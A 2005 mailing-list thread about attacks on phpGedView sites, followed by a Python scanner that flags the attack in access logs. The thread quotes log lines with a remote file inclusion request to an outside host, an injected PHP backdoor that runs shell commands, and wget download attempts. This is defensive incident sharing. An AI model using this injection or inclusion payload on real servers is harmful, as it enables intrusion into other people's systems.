Re: [Phpgedview-talk] attack attempt
From: Johan B. <mai...@go...> - 2005-12-25 10:25:26
Hi Folks,

Another attempt here at http://barelds.good-it.com. See below a piece from my webserver logs:

---------------------
81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!"
87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Sgrunt| V109|1012|S214027450|dialno; snprtz|dialno)"
---------------------

The URL mentioned in the log is still there and available. Perhaps someone should notify the ISP?

Grz.
Johan

On Tuesday 20 December 2005 20:31, Matthew Gates wrote:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other fields in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> From my log files it looks like the attacker was trying to download a linux
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent me
> this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,

-- 
Kind Regards / Met vriendelijke groet,

Johan Barelds
Good-IT!
Tel. +31(0)70-3296957
Mob. +31(0)6-54253750
Martinus Nijhoffweg 42
2548 EP Den Haag
j.b...@go...
http://www.good-it.com
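Matthew's advice to grep the access logs, applied to the requests Johan quotes, as an added example that is not part of this thread and not phpGedView code: a small Python scanner that parses Apache combined-format lines and flags the three signs of this attack, a `suntzu` parameter (the trigger for the injected `system($_GET[suntzu])`), `PGV_BASE_DIRECTORY` set to a remote URL (remote file inclusion), and a download tool named in any parameter value. The two attack lines are the ones from Johan's log; the third line is a constructed benign request for contrast, and the regex and reason strings are this example's own choices.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]+)?" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Sample input: the two requests quoted in the post above, plus one constructed benign request.
SAMPLE_LOG = [
    '81.91.66.220 - - [25/Dec/2005:05:38:06 +0100] "GET /phpgedview/help_text_vars.php?suntzu=df&PGV_BASE_DIRECTORY=http://mondomix-planet.com/radio/encrypt.txt HTTP/1.1" 200 64 "-" "Ziggy -- The Clown From Hell!!"',
    '87.64.24.78 - - [25/Dec/2005:05:39:02 +0100] "GET /phpgedview/?suntzu=ls HTTP/1.1" 200 1542 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Sgrunt| V109|1012|S214027450|dialno; snprtz|dialno)"',
    '192.0.2.10 - - [25/Dec/2005:06:00:00 +0100] "GET /phpgedview/individual.php?pid=I1 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',  # constructed, benign
]

def suspicious_reasons(line):
    """Return the reasons a log line matches the attack pattern from the thread
    (empty list = nothing matched, ["unparseable"] = not combined-log format)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    parts = urlsplit(m.group("target"))
    # keep_blank_values so a bare "?suntzu" with no value is still noticed
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if "suntzu" in params:
        reasons.append("suntzu backdoor trigger")  # injected code runs system($_GET[suntzu])
    for key, values in params.items():
        for value in values:
            value = unquote(value)  # second decode catches double-encoded values
            if key.upper() == "PGV_BASE_DIRECTORY" and re.match(r"(?i)^(https?|ftp)://", value):
                reasons.append("remote file inclusion via PGV_BASE_DIRECTORY")
            if re.search(r"\b(wget|curl)\b", value):
                reasons.append(f"download tool in parameter {key!r}")
    return reasons

def scan(lines):
    """Return (host, path, status, reasons) for every matching request in an access log."""
    hits = []
    for line in lines:
        reasons = suspicious_reasons(line)
        if reasons:
            m = LOG_RE.match(line)
            host, path, status = (m.group("host"), urlsplit(m.group("target")).path, m.group("status")) if m else ("?", "?", "?")
            hits.append((host, path, status, reasons))
    return hits

if __name__ == "__main__":
    for host, path, status, reasons in scan(SAMPLE_LOG):
        print(f"{host} {path} HTTP {status}: {', '.join(reasons)}")
```

Both attack requests in the sample returned HTTP 200, which is why the status is carried along: a 200 on a request carrying `suntzu=` is the line worth looking at first.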